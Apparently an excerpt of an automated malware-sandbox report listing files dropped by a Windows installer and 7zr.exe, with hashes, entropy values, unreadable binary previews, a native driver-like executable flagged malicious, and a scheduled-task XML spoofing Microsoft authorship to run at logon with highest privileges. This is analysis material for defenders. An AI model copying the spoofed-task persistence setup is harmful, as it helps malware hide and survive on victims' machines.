Preview: .@S.....6...................!Z...;o..!5.G3...?.... ......i....v...p......*]..b....l...J..J?.. .5...m.u......]............%;..L......'..@.Mt....-......x.{.D.8".Nnn6C.bh*S}y..Z?21*B.....WUCrz.+.<#.W.B/.1.j:...%..+..M]..w...t.^...zb.o..c.(.........K..|j..}>.ciK...Z..k.T..co....}..m:.+A.F...;...JT....]...[....>W...2......8..~s0.Dj...........K.+Is..{.v:.......!...].....g7..EDf+G.....w.+.Y.m.z..).7..?%..{d.Y.&.)s..+bH..+..P'.$..gS*h....G...1|{..t...y.m.9...3m...u..|.e...PVC3..T\....-....._(.K....I.l.;+...Y;*.....9Gj..9..h..kwA.8........bf.)\..0..N..VE.bX.>#.....i..._..U..x....m......pE..e%......l.kY..a.Y1$..z..5._NPB.<...w......(.>30U.........%...._.X....zd..[.{...A.U....3...:..t..._l\{.|}&.../.U..4}:.-...%(.'sZabL..t8...j..9.),....N.yP....a...~&1........fDS5...7.z$6...... .[I]........9..S.7_...y.d.6... .M..z...az..8...+?._..ib...M...^P}vM3...\!..;.O.}...*... Zp#)..r..l.#..3...F.K..B..2kbr.....y..:.=...\. ........`Z..u.R....8...c..e.f.T

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: data
Category: dropped
Size (bytes): 1803979
Entropy (8 bit): 7.999882930255694
Encrypted: true
SSDEEP: 49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
MD5: 120881F751D8AC3C5ABE1FED5EFAD2AE
SHA1: DDB9BDACE6DE20213B844BE9E1FE67B475660455
SHA-256: 30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
SHA-512: EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
Malicious: false
Preview: V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56530
Entropy (8 bit): 7.9968380149923775
Encrypted: true
SSDEEP: 1536:eIJEBB8fJtUFlKiedDsLrObUvIjwBlnoL8AE:rEBBGiwDwE83
MD5: 6520FCCCF7582751CB5C0EDA1135F0CE
SHA1: 8F2F62DDF46BB755B927879E5F306D87EE366628
SHA-256: 7682005B326053CDB2DB5728AA8E41A27216379407C1CFBE616FBA3E8ECAF660
SHA-512: 2907078ED6E68183C38C15000F65696D25AACBAC1172BFB599EDAAEA992A7789E0D087DC1AD0B789B51C699A31AD8F3D624466532706C822C191EC2889FBC91C
Malicious: false
Preview: .@S.......N| .................]..|.1....M."..Fc..m..0...y=.a..A.!.....}1...<yk......I.#......j...^+#...G.Q./-.?:;=.m..8%.FO..<q..$..1....(.bf..TS....J&..c...........2z..8.|...).......c...R......Z..f.4`.....0=1$..]<<C..UVy).......>..........i..>...,....q..u.<...{.~g.,..N....u.8..!.;..p......6.1.....*.rG..!..I@..;..~c..l....V.P..YS.....,Gg.T...q....7p.Z`.r......*....:F.E..%..K+.%hEE.J......l..i_..CR....a..^....kQ.i......$..(.d.V.M;YX..|."..C.4..G...F....-...p..%..Ip.r....a.y.....W....$....kd...2.z6o..e....... I.@..)A.WL<..z.WsM;........0pfA.m....{.M......K...'.......>.......[.gO......H....+.#.,...7N:..l|.Zg......l.+....a...t.]./.?.Kv..m.........Bq..~.YP?N7.+P3....k...E.......?..<l...!S.4..N.8......#?@)...?M.\C.rUi.F.<...p.R.p~.'..c..'S..t v.g....X....h.W.I....P..U.'..oJ.'.-.{?.._....W....0.+N.+.P.vwF..\/..-{.%..e].q.=.@.|.@.B.\.."......X....@..^..F.c...@7..T.....1...k!.1[.!.D.............-......Q.........<.._/s9n&..78....V..p.C

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56530
Entropy (8 bit): 7.996838014992376
Encrypted: true
SSDEEP: 768:3+wwYQzmSwBLGw8b95CEHJGDARzCh+7poOvotI0NtK+pfrNPnnsYa+7VyzlKx6qK:3SjMN2JGD6eRy21jNPnsYsRT9VN
MD5: 7298ADFBE18EAEBBFFAF9733A10E1579
SHA1: 49CE3A1424E05114FAD9A68035C6BDEC1EB4062C
SHA-256: 3AADE7040A0D5452FA649088C6B3E1629457B0BC741A390F12BF6BDEBC892CD8
SHA-512: 37B3BF7ECFC05FED760181B64F8F66E16024B9926F4F3888C6BD5CDFA94F35D92598E5DBD312FE741118302861628AC8E411585C68B8A5B819251FC46EE9FDF6
Malicious: false
Preview: 7z..'...2.y.........2.......-Q.|.~..B.~.`j...<k..2a9h.XE.c...o./..S..B6..D....&....!h...r..$d.Z.^e.3...$....Z4......g....<.w<..J..[...;XL.j,.'.p...6'd..UR.$..U..I..T.(.i...z.p2.9.lji.9.....0..(..cT.jDW.l..y.u.G......B3....eR.....L<xB.....0.GV.0T...C..WDB.*(..B.tA.....7.4....g(...xa...jI....$C.swm..Y.#.h_.P.n.q.....mL...g.t....j./.......=....f.Ee..].Ak........!.:.9n|.G..+.j..nC....j.N...x...J..<.L.`..Xt*.."....n.f.Gw.h.....}...m/.:..S.n......m..,.#[>....?.&G.K...M\0a../..8J#._.]..8m...I..@.W}..t5...|.>.`l#.7..}.@|."e.o.v.M..+}.d...t".q....Pk.....d...n.<1t5-.....DL..IWq..6#...9.pm.P@~z.b._....QNe...+...P.........I9|.."..Ko_E....2..^.2`...[..ui......Y.:a.W...B.+'..h6.....r...|..b..SD..*.[1AK&...~..Y...X.<6{....<,......p.'.z..m...}.@..P1..o.`.....,..z..a...<..F.)U..(.!.t...T.....c....~..N...+.....Ks9<.3..f.P.L.g.B...6)..n....(...h.;...f.......P.lJB.......^.3....G..M...VT..S....&{.S..7...*.^\L...U.sKg.G...K..a.lhG.$>.tI.5}9s....@...].sQ,'..Hle.n.

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8 bit): 7.996966859255975
Encrypted: true
SSDEEP: 1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5: CEA69F993E1CE0FB945A98BF37A66546
SHA1: 7114365265F041DA904574D1F5876544506F89BA
SHA-256: E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512: 4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious: false
Preview: .@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56546
Entropy (8 bit): 7.996966859255979
Encrypted: true
SSDEEP: 1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
MD5: 4CB8B7E557C80FC7B014133AB834A042
SHA1: C42E2C861FF3ED0E6A11824E12F67A344E8F783D
SHA-256: 3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
SHA-512: A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
Malicious: false
Preview: 7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951708
                            Encrypted:true
                            SSDEEP:49152:q2vqFHUMpJh0mjPzJvUUeSCWZbM00JoC/iZ7YHmwKm5OiRg/3btc:qVUMpskLJ00KLxiO/7g/3btc
                            MD5:D5A5A092107E0215609A9C71466EADAE
                            SHA1:50D6E1FB8CDE0E7F7131F12CAF2AD728274EE8FE
                            SHA-256:9007F916A0B68BBE7701F9940D8635E0A0F5E417F600AC875BDEDCEDDECA1F04
                            SHA-512:21F6575350F9840FFE4ED3A6F40EC584848FCD56D1ADD9FCAD527B54B097BCE5DF29F1B39DE709C632E1770C69D1D893BED53518B78AE64ADE9F36B3892B006D
                            Malicious:false
                            Preview:7z..'.....nVpW......@..........J).^G.......m.r..T..Y...s..z4z@..t.6 L.L..\.`..`.~2..M^.;....fnQ...fC.h.@aR....=.&...Se...#Y`..."6N.].0.....1.6s..S.......9..n.l.9.:.....#.....u!......^..........G....v..8....fVd..s..h..._.Q......y.A._g...CBXi~}[.6.Q@..T/..u....w=...n...".^5....#../H.M.|k..; d/d...H.8..,.l.{x^..!......Q.p......>..uU....;9....N..&+.....j.>5...K3..moC.r......J.X.7t...!|....pb.U&.U.mg...*..)....k.U......gr..%.\&V.....p..%\4.P..s....o.~.D..7qY.J...b.F.Gj.......ioV=.L".3-...-[=V`....B..d/p"..._..v?...,.i..d~...)...s.;.AG..m./qc.u.V.?LF...@..0..P.tn.....{I ./A-...5.~A..Z.$7......'y..W.!.x...`.X.......A.........W'D..=.J2^......{.....Y....\...<... ?..=(.;.?].>.....;...1.....U......y...Z...X.[...%.&..x..k.....!...._..\.L...`v.^...|.T..rA3h.....ff..[.o.....m.o........".O...I...KAj.<..u...[...R."..~.E.!...E..*#..f..}C...l.,4.._R.S;9......Zv...w.^...+.]s3.~.6....ih.a!U.S..<..[...G...N......s3..-.......Z.../...g....L[...h.oS.,..o1...1..
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            • Antivirus: Virustotal, Detection: 6%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3482223822620667
                            Encrypted:false
                            SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                            MD5:1E1D0466AB0FE8F2802587D337A10567
                            SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                            SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                            SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1803979
                            Entropy (8bit):7.999882930255694
                            Encrypted:true
                            SSDEEP:49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
                            MD5:120881F751D8AC3C5ABE1FED5EFAD2AE
                            SHA1:DDB9BDACE6DE20213B844BE9E1FE67B475660455
                            SHA-256:30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
                            SHA-512:EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
                            Malicious:false
